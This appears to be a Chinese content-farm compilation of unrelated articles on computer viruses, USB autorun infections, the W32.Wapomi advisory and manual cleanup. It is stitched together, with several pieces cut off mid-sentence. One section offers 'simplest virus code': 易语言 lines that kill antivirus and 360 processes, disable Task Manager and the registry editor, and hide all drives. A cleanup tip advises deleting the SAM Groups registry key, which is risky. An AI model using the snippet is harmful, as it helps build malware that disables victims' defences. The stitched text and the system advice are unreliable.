1kb快捷方式病毒

网络安全常见的病毒网络安全是当前信息社会中非常重要的一个议题，而病毒作为网络安全的主要威胁之一，也是最常见的威胁之一。

下面将介绍网络安全中常见的几种病毒。

1. 计算机病毒：计算机病毒是一种能够自我复制并传播的程序代码，它通过附着在其他程序上进行传播。

一旦感染了计算机，病毒会破坏或篡改一些文件，甚至可能导致系统崩溃。

计算机病毒分为文件病毒、宏病毒、引导扇区病毒等多种类型。

2. 间谍软件：间谍软件是一种能够悄悄安装在计算机上并监视用户活动的恶意软件。

它可以记录用户的打字记录、浏览历史、密码等敏感信息，并将这些信息发送给攻击者。

间谍软件通常会以广告软件、共享软件等形式传播。

3. 蠕虫病毒：蠕虫病毒是一种能够通过网络自我复制和传播的恶意软件。

它可以利用漏洞或弱密码进入计算机，并在计算机上创建多个副本。

蠕虫病毒会耗尽网络带宽、降低系统性能，并可能导致网络故障。

4. 木马程序：木马程序是一种利用用户不知情的情况下通过文件共享、电子邮件附件等方式植入计算机的恶意软件。

一旦感染，木马程序会在后台运行，并允许攻击者远程控制计算机，窃取敏感信息、传播病毒等。

5. 勒索软件：勒索软件是一种通过加密用户文件或禁用访问权限来勒索钱财的恶意软件。

一旦感染，用户将不能打开或使用自己的文件，攻击者会要求用户支付赎金才能恢复文件。

勒索软件通常通过恶意链接、广告等方式传播。

以上所列举的病毒只是网络安全中的冰山一角，还有很多其他类型的病毒也是网络安全威胁的重要组成部分。

为了保护网络安全，个人和机构应该定期更新操作系统、软件，安装防病毒软件和防火墙，并保持警惕，避免点击可疑链接、下载不明文件等行为。

autorun.inf病毒
简介
autorun.inf病毒是一种常见的计算机病毒，它通过在USB 设备、CD/DVD光盘等可移动存储介质的根目录中创建autorun.inf文件来传播和感染其他计算机。

这种病毒利用操作系统的自动运行功能，在用户插入U盘或打开光盘时自动运行恶意代码，从而使得计算机受到感染。

如何感染
autorun.inf病毒主要通过以下方式感染电脑：
1.插入感染了autorun.inf病毒的USB设备：当用户
插入U盘或其他可移动存储介质时，操作系统会自动执行autorun.inf文件中的命令，从而运行病毒的恶意代码。

2.打开感染了autorun.inf病毒的光盘：类似地，当用
户插入一张感染了autorun.inf病毒的CD/DVD光盘时，操作系统也会自动执行autorun.inf文件，导致计算机感染病毒。

后果
autorun.inf病毒可能会导致以下一些严重的后果：
1.数据丢失：一些恶意的autorun.inf病毒会删除或加
密用户的重要文件，导致数据丢失或无法访问。

2.隐私泄露：autorun.inf病毒可能会通过恶意代码收
集用户的个人信息，如登录凭证、银行账号等，从而导致用户隐私泄露。

3.系统崩溃：某些autorun.inf病毒会对操作系统进行
破坏性操作，导致系统崩溃或无法正常运行。

预防方法
为了避免autorun.inf病毒的感染，我们可以采取以下预防措施：
1.关闭自动运行功能：在Windows操作系统中，可
以通过禁用自动运行功能来阻止autorun.inf病毒的传播。

具体操作步骤为：在开始菜单中搜索。

计算机病毒的常见名称有哪些计算机病毒的内部往往有一种触发机制，不满足触发条件时，计算机病毒除了传染外不做什么破坏。

触发条件一旦得到满足，有的在屏幕上显示信息、图形或特殊标识，有的则执行破坏系统的操作，如格式化磁盘、删除磁盘文件、对数据文件做加密、封锁键盘以及使系统死锁等。

以下是店铺网小编为大家整理的关于常见计算机病毒名称的相关知识，希望对大家有所帮助!Macro Virus 宏病毒，主要感染微软OFFICE软件的文档，包括WORD/EXCEL/PPT/ACCESS文件，它们使用OFFICE系统的“宏功能”自动感染上述文件，并且可以用EMAIL附件作为载体传播自身Memory Resident Virus 常驻内存型病毒，它们在操作系统启动的时候把自身加载在内存之中并常驻，尝试感染所有或是特定类型的文件，或让正常运行的程序变得异常Overwrite Virus 文件内容覆盖型病毒，它们传播自身并把所有被感染的文件内容使用自身的字节码覆盖，让正常文件大小看起来“没变化”但是完全变成了无用的东西Direct Action Virus 这种病毒经常把启动自身的命令行放在计算机的“自动引导”文件中，然后在操作系统启动的时候直接运行病毒程序，目前已经很少见了Directory Virus 目录型病毒，这种病毒感染整个目录下的文件并可能会把目录改名，目前已经很少见Web Scripting Virus 网页脚本病毒，这种类型的病毒使用脚本语言编写，通过浏览器执行并试图通过浏览器控制计算机，如果使用火狐、谷歌浏览器则比较少会被这种类型攻击FAT Virus 分区表病毒，这种类型的病毒感染计算机的分区表，经常会把整个硬盘上的文件变得不可用Companion Virus “伙伴”病毒，这种病毒直接寻找特定类型的文件去感染，在被感染文件执行的过程中完成传播和破坏Polymorphic Virus 多态病毒，这种病毒使用了高级编程技术，在运行的时候会把自身代码不断加解密以逃避杀毒软件的“特征码”查毒方式，是一种比较难以查杀的病毒Worm 蠕虫病毒，其破坏力不大，但是非常喜欢复制自身，拖慢系统的速度Trojan 特洛伊木马病毒，也叫做“后门程序”，它们把自身隐藏在系统中，随系统自动加载，监控用户的键盘、鼠标甚至摄像头、麦克风等输入设备，记录用户的信息和行为并发送到指定的地方，最喜欢攻击聊天软件或是网银软件、以及盗窃浏览器窗口的输入信息Email Virus 电子邮件病毒，其主要以电子邮件附件的形式来传播自身Browser Hijacker 浏览器劫持插件，其类型多种多样，最喜欢干的事情就是强制用户访问某个网站或是不停的弹出广告，属于危害性不大但是让人很恼怒的有害程序Boot Infector 引导型病毒，这种病毒将自身拆成几个片段分别藏在磁盘的不同地方，并将最重要的用于“引导”自身的那个片段放在引导区中，让杀毒软件很难将其清除病毒名称由前缀、病毒名、后缀(一般是变种代号)组成，如“Backdoor.RmtBomb.12”“Trojan.Win32.SendIP.15”等。

本文部分内容来自网络整理，本司不为其真实性负责，如有异议或侵权请及时联系，本司将立即删除！== 本文为word格式，下载后可方便编辑和修改！ ==电脑粘键病毒篇一：一招废掉电脑里所有木马病毒一招废掉电脑里所有木马病毒1.前言：木马的危害，在于它能够远程控制你的电脑。

当你成为“肉鸡”的时候，别人(控制端)就可以进入你的电脑，偷看你的文件、盗窃密码、甚至用你的QQ发一些乱七八糟的东西给你的好友??木马大量出现，在于它有着直接的商业利益。

一旦你的网上银行密码被盗，哭都来不及了。

正因为如此，现在木马越繁殖越多，大有“野火烧不尽”之势。

木马与病毒相互配合、相得益彰，危害越来越大。

毫不夸张地说：木马就是从网线上走进你家里的小偷强盗。

防杀木马，已成为现代电脑用户的必修课。

2.原理：木马危害，虽然手段繁多，但是万变不离其宗，其中必需的步骤是在你的系统里建立管理员用户。

本文就是从这一环节入手，阻止木马建立用户。

这样，即便你的电脑已经感染了木马病毒，但是由于不能建立用户，木马就不能发挥远程控制的功能。

换句话说，就是废了它，让他变成垃圾。

当然，垃圾也需要清理，但这已经不在本文的讨论范围之内了。

3.方法：运行 regedt32.exe打开你的注册表，里面有一个目录树：打开其中目录 HKEY_LOCAL_MACHINE再打开其中目录 SAM再打开其中目录 SAM再打开其中目录 Domains再打开其中目录 Account再打开其中目录 Groups好了，就是这个 Groups就是负责建立用户的。

删掉它，系统就不能建立用户了。

无论木马怎样折腾，都无法建立用户，更谈不上提升为管理员了。

这个目录里的文件如果被删除，是没有办法还原的。

所以，在这个操作之前，你必须要进行备份，必要的时候，可以还原。

备份方法：右键点击 Groups选择“导出”，给导出的文件起个名字，保存好，就可以了。

4.说明：可能你进入注册表的时候，只能看到第一个 SAM目录，其他的都看不到。

最简单的电脑病毒代码是什么你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由店铺给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!最简单的电脑病毒代码介绍：绕过杀毒软件防御：运行(“taskkill /f /im kavsvc.exe”, 假, 1)运行(“taskkill /f /im KVXP.kxp”, 假, 1)运行(“taskkill /f /im Rav.exe”, 假, 1)运行(“taskkill /f /im Ravmon.exe”, 假, 1)运行(“taskkill /f /im Mcshield.exe”, 假, 1)运行(“taskkill /f /im VsTskMgr.exe”, 假, 1)修改系统时间：置现行时间 (到时间(“8888年8月8日”))禁用任务管理器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \DisableTaskMgr”, 0)禁用注册表：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \Disableregistrytools”, 1)隐藏开始中的运行禁止WIN2000/XP通过任务管理器创建新任务：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoRun”, 1)隐藏“MS-DOS方式”下的磁盘驱动器。

不管是在“我的电脑”里，或“MS-DOS”方式下都看不见了：写注册项(3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)隐藏开始中的关机：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索：写注册项(3, “Softw are\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)OVER360防御：写注册项(4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)结束360进程运行(“taskkill /f /im 360tray.exe”, 假, 1)隐藏所有驱动器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDrives”, 4294967295)禁止所有驱动器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoViewOnDrive”, 4294967295)隐藏文件夹选项：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFolderOptions”, 1)将桌面对象隐藏：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDesktop”, 1)隐藏开始中的关机：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)这条有两种情况。

快播病毒W32.Wapomi运行时，该病毒会通过多种方式阻止用户删除它所保护的注册表键值，并通过映像劫持禁止安全软件运行。

病毒名称：W32.Wapomi病毒类型：病毒受影响的操作系统：Windows 95/98/2000/Me/XP/Vista/NT, Windows Server 2003病毒分析：很多用户可能都使用过一款名为“QVOD(快播)”的视频播放软件。

近期赛门铁克安全响应中心检测到一个病毒W32.Wapomi，它将自身文件的版本信息伪装为QvodInstall Module，并且采用了一个与快播图标非常相似的标识，从而诱导用户将其误认为快播的安装程序。

运行时，该病毒会通过多种方式阻止用户删除它所保护的注册表键值，并通过映像劫持禁止安全软件运行。

此外，W32.Wapomi还会从指定网站下载更多的恶意程序到用户机器并运行，并且把从用户计算机中搜集到的信息发送给攻击者。

该病毒采用多种方式进行传播：1. 把自身拷贝到各磁盘分区的回收站中，并添加对应的autorun.inf;2. 使用自带的密码表尝试连接开有远程共享服务的计算机，一旦成功就会试图把病毒自身复制到远程机器;3. 感染在用户计算机上找到的exe文件，被感染的文件检测为W32.Wapomi!inf. 当用户运行被感染文件时，它会首先释放W32.Wapomi并运行。

安全建议1.关闭计算机对可移动存储设备的自动播放功能。

2.建议用户采用比较复杂的计算机登录密码，以防止该病毒尝试通过远程共享服务登录您的计算机。

伪“qvod”快播下载地址：/?p=309病毒名称：伪“qvod”受影响的操作系统：Windows 95/98/2000/Me/XP/Vista/NT, Windows Server 2003病毒简介: 又一款病毒软件穿上快播QVOD的外衣，利用广大用户对QVOD的喜爱诱使大家上当，网民朋友一旦不小心安装了“伪QVOD”，电脑将会感染上病毒并造成严重后果。

计算机病毒分类随着计算机技术的快速发展，计算机病毒也逐渐成为了计算机安全的一大威胁。

为了更好地理解和应对计算机病毒，我们需要对其进行分类。

本文将从不同的角度对计算机病毒进行分类，并介绍每一类病毒的特点和危害。

一、按照传播方式分类1. 直接执行病毒直接执行病毒是最常见的一类计算机病毒，其通过感染可执行文件的方式传播。

当用户运行被感染的文件时，病毒将开始执行，并在计算机系统内进行复制和传播。

这类病毒通常会修改或破坏系统文件，导致计算机系统崩溃或无法正常工作。

2. 文件病毒文件病毒是通过感染文档文件来传播的病毒。

当用户打开被感染的文档时，病毒将自动复制并传播到其他文件中。

这类病毒通常会对文件进行修改或删除，导致数据丢失或文件损坏。

3. 启动区病毒启动区病毒是感染计算机的启动区或主引导记录的一类病毒。

当计算机启动时，病毒将加载到内存中，并感染其他存储介质或文件。

这类病毒通常会破坏或替换系统启动文件，使计算机无法正常启动。

二、按照破坏性质分类破坏性病毒是一类会对计算机系统和文件进行破坏的病毒。

这些病毒通常会删除、修改或破坏重要的系统文件和数据，导致计算机系统无法正常运行或数据丢失。

2. 侵害性病毒侵害性病毒是指会侵害用户隐私和安全的一类病毒。

这些病毒通常会窃取用户的个人信息、密码和敏感数据，并传输到黑客的服务器上。

这类病毒对用户的隐私和财产安全构成威胁。

3. 广告病毒广告病毒是一类会在计算机上不断弹出广告窗口的病毒。

这些病毒通过强制弹出广告来产生收入，严重影响用户的正常使用体验。

三、按照操作系统分类1. Windows病毒Windows病毒是专门感染Windows操作系统的一类病毒。

由于Windows操作系统的广泛使用，这类病毒数量众多且变种频繁，对Windows系统的安全造成了很大威胁。

2. Mac病毒Mac病毒是专门感染Mac操作系统的一类病毒。

虽然Mac操作系统的安全性相对较高，但仍然存在少数针对Mac的病毒，用户仍需保持警惕。

怎么判断电脑中病毒然众多公司开发了各种各样的反病毒软件，但只有当新病毒出现后，杀毒软件并无法杀死该病毒，面对新出现的病毒，也只是傻傻的看。

应该怎么判断电脑中病毒了呢?小编为大家分享了判断电脑中病毒的方法，下面大家跟着店铺一起来了解一下吧。

判断电脑中病毒技巧一、进程首先检查的就是进程了，方法简单，开机后，什么都不要启动!第一步：直接打开任务管理器，查看有没有可疑的进程，不认识的进程可以Google或者百度一下。

PS：如果任务管理器打开后一闪就消失了，可以判定已经中毒;如果提示已经被管理员禁用，则要引起警惕!第二步：打开冰刃等软件，先查看有没有隐藏进程(冰刃中以红色标出)，然后查看系统进程的路径是否正确。

PS ：如果冰刃无法正常使用，可以判定已经中毒;如果有红色的进程，基本可以判断已经中毒;如果有不在正常目录的正常系统进程名的进程，也可以判断已经中毒。

第三步：如果进程全部正常，则利用Wsyscheck等工具，查看是否有可疑的线程注入到正常进程中。

PS：Wsyscheck会用不同颜色来标注被注入的进程和正常进程，如果有进程被注入，不要着急，先确定注入的模块是不是病毒，因为有的杀软也会注入进程。

二、自启动项目进程检查完毕，如果没有发现异常，则开始排查启动项。

第一步：用msconfig察看是否有可疑的服务，开始，运行，输入“msconfig”，确定，切换到服务选项卡，勾选“隐藏所有Microsoft服务”复选框，然后逐一确认剩下的服务是否正常(可以凭经验识别，也可以利用搜索引擎)。

PS：如果发现异常，可以判定已经中毒;如果msconfig无法启动，或者启动后自动关闭，也可以判定已经中毒。

第二步：用msconfig察看是否有可疑的自启动项，切换到“启动”选项卡，逐一排查就可以了。

第三步，用Autoruns等，查看更详细的启动项信息(包括服务、驱动和自启动项、IEBHO等信息)。

PS：这个需要有一定的经验。

三、网络连接ADSL用户，在这个时候可以进行虚拟拨号，连接到Internet了。

灭毒有招如何全面清除计算机病毒（防毒技巧）网络时代，病毒已经无所不在。

在层出不穷、变化多端的病毒袭击下，中招基本上是不可避免的了。

那么中招以后我们改如何处理（当然必须处理，否则计算机没法替你工作）？是格式化系统然后重装Windows,还是请人帮忙……。

因为职业关系，我不得不与这些让人讨厌的东西战斗着，逐步地积累了一些行之有效的办法，供大家参考。

一、中毒的一些表现我们怎样知道电脑中病毒了呢？其实电脑中毒跟人生病一样，总会有一些明显的症状表现出来。

例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开，电脑不能正常启动、硬盘分区找不到了、数据丢失等等，就是中毒的一些征兆。

二、中毒诊断1、按Ctrl+Shift+Ese键（同时按此三键），调出windows任务管理器查看系统运行的进程，找出不熟悉进程并记下其名称（这需要经验），如果这些进程是病毒的话，以便于后面的清除。

暂时不要结束这些进程，因为有的病毒或非法的进程可能在此没法结束。

点击性能查看CPU和内存的当前状态，如果CPU的利用率接近100%或内存的占用值居高不下，此时电脑中毒的可能性是95%。

2、查看windows当前启动的服务项，由“控制面板”的“管理工具”里打开“服务”。

看右栏状态为“启动”启动类别为“自动”项的行；一般而言，正常的windows服务，基本上是有描述内容的（少数被骇客或蠕虫病毒伪造的除外），此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称，假如其名称和路径为C:\winnt\system32\explored.exe，计算机中招。

有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边，中间有一纵向的滚动条，而右边为空白，再双击添加/删除程序或管理工具，窗体内是空的，这是病毒文件winhlpp32.exe发作的特性。

3、运行注册表编辑器，命令为regedit或regedt32,查看都有那些程序与windows一起启动。

、按Ctrl + Alt + Del 打开任务管理器，点“进程”，结束掉Global.exe, KEYBOARD.exe, fonts.exe,(安全模式应该只有Global.exe这一个)，稍等一下，检查确认这三个进程没有再次出现在列表中后，关闭任务管理器。注意：在整个过程中仅此一次启动任务管理器，直到杀毒结束之前千万不要再次启动。 2、启动SREng, 点“启动项目”，其弹出的所有您不知道是什么作用的信息请均选“否”或“关闭”，把列表中所有大小显示是"220K"且公司信息(就是文件名下面的文字)为空的项目全部删除，把以[IFEO]开头的项目也全部删除。 3、点左侧的“系统修复”，直接点“文件关联”选项卡右下的“修复”；再点最右侧的“高级修复”选项卡，点“自动修复”。然后关闭SREng。 4、打开winrar，把下面的文件一个个找出来删除，点"删除"或“delete”时请按住Shift，(即不放进回收站，至于怎样用winrar浏览、删除文件，不用我多说了吧) c:\windows\system32\drivers\drivers.cab.exe c:\windows\system32\dllcache\ 中的所有文件 c:\windows\fonts\ 中图标为文件夹，文件大小为225,280的所有文件(可以把文件按大小排列，很容易找到的) c:\windows\pchealth\binaries\HelpHost.com (注意是.com不是.exe,c:\windows\pchealth\Global.exe也一起删除) c:\windows\Media\rndll32.pif c:\windows\system\KEYBOARD.exe c:\autorun.inf（d:\; e:\; f:\ „„等所有分区下的这个文件都要删除） c:\ms-dos.com（d:\; e:\; f:\ „„等所有分区下的这个文件都要删除） 5、重新启动windows，此时语言栏应该就出来了。 6、用winrar检查一下步骤4中的最后两个文件还有没有，没有就大功告成了~ 7、记得用winrar把所有插过的移动硬盘、u盘中的autorun.inf和所有大小为225,280的文件(ms-dos.com，以及有可能是文件名跟根目录下的文件夹相同，后缀为exe的文件，千万小心别运行了任何一个，否则前功尽弃)全部删除。至于被隐藏的文件夹，可以用winrar把里面的文件拖出来，重新整理一下，在下是暂时不知道该如何改过来的。。。

cmd病毒CMD病毒: 一种威胁计算机系统安全的恶意程序引言：近年来，随着互联网的普及和计算机技术的发展，计算机安全问题变得越来越重要。

恶意软件和病毒的出现对个人用户和企业组织的计算机系统造成了严重的威胁。

本文将重点介绍一种常见的恶意软件，CMD病毒。

什么是CMD病毒？CMD病毒是一种利用Windows操作系统的命令提示符（CMD）功能来感染计算机系统的恶意程序。

CMD病毒可以通过操纵操作系统的命令提示符功能，对计算机系统进行非法操作和破坏，从而造成计算机数据丢失、系统崩溃以及用户个人隐私泄露等问题。

CMD病毒的传播途径：CMD病毒主要通过以下几种方式进行传播：1. 可执行文件感染：CMD病毒可以通过感染可执行文件，使得用户在执行被感染的可执行文件时，自动启动CMD病毒并进行系统操作。

2. 受感染的存储介质：CMD病毒可以利用USB闪存驱动器、光盘和移动硬盘等可移动存储介质，通过在其中隐藏自身的方式进行传播。

3. 垃圾邮件和恶意链接：CMD病毒可以通过垃圾邮件的附件和恶意链接进行传播。

一旦用户点击或打开这些恶意附件或链接，CMD 病毒将会下载并感染计算机系统。

CMD病毒的危害：CMD病毒的存在给计算机系统带来了严重的危害。

以下是几个主要的危害方面：1. 数据泄露：CMD病毒可以窃取用户的个人隐私信息，如登录名、密码、银行账户信息等，并将这些信息传送给黑客。

2. 系统破坏：CMD病毒可能会修改系统文件和注册表项，破坏操作系统的正常运行。

这可能导致系统崩溃、无法启动以及数据丢失等问题。

3. 网络攻击：CMD病毒可以将感染的计算机变成僵尸网络的一部分。

黑客可以利用这些被感染的计算机进行分布式拒绝服务攻击（DDoS）或其他网络攻击行为。

CMD病毒的防范和清除：为了保护计算机免受CMD病毒的威胁，采取以下预防和清除措施是至关重要的：1. 安装杀毒软件：选择一款常更新的可信赖的杀毒软件，并定期对计算机进行全面扫描以确保系统的安全。

第一章常见病毒查杀1.1 U盘病毒的运行原理及防治方法常使用U盘的朋友可能已经多次遭遇到了U盘病毒，U盘病毒是一种新病毒主要通过U盘、移动硬盘传播。

目前，各杀毒软件尚未将它列为病毒.而在U盘中毒时将其接入电脑,双击打开U盘盘符时便通过Autorun.inf激活病毒从而使系统感染。

病毒组成:autorun.inf、msvcr71.dll、RavMonE.exe、RavMonLog1.1.1 U盘病毒原理U盘病毒主要依赖于U盘等可移动设备生存,当用户从网上下载文件并拷贝到U盘时便可能中了U 盘病毒,当用户双击U盘盘符时,便启动了隐藏了的Autorun.inf等系统文件,Autorun.inf是一个安装信息文件,通过它可以实现可移动设备的自动运行。

有些资料认为Autorun.inf是最典型的中层病毒，是一个主病毒的第一级执行文件，本身INF是不会称为病毒而被任何一款杀毒软件查杀的，但单纯的在U盘类盘中是有可能杀掉的！在Autorun.inf出现的初期，是软硬件生产厂家为了更好的介绍自己的产品或者为了使用户更易使用产品而设置的自引导文件，后来才被病毒制作者利用。

现在大部分以只读光盘为载体的软件产品依然使用Autorun.inf，但是由于只读光盘的不可写性，只要第一次刻录没有写入病毒，使用者并不会以它传播病毒。

autorun.inf是保存在驱动器的根目录下的（是一个隐藏的系统文件），它保存着一些简单的命令，告诉系统这个新插入的光盘或硬件应该自动启动什么程序，也可以告诉系统让系统将它的盘符图标改成某个路径下的icon。

其文档格式为:[autorun]open=病毒.exe (这个是让U盘被双击自动运行时打开病毒.exe)icon=*.icon (如果有图标文件*.icon,则U盘的盘符显示出该图标.)u盘病毒就是利用这种方式来在用户不知情的情况下双击盘符打开u盘时是系统中毒的，而病毒主体实际上也是隐藏在u盘中.1.1.2 U盘病毒防范U盘病毒的感染，一部分是用户去点击运行U盘上的可执行文件感染的，另一部分是由于移动存储设备插入时启用了自动播放而感染的。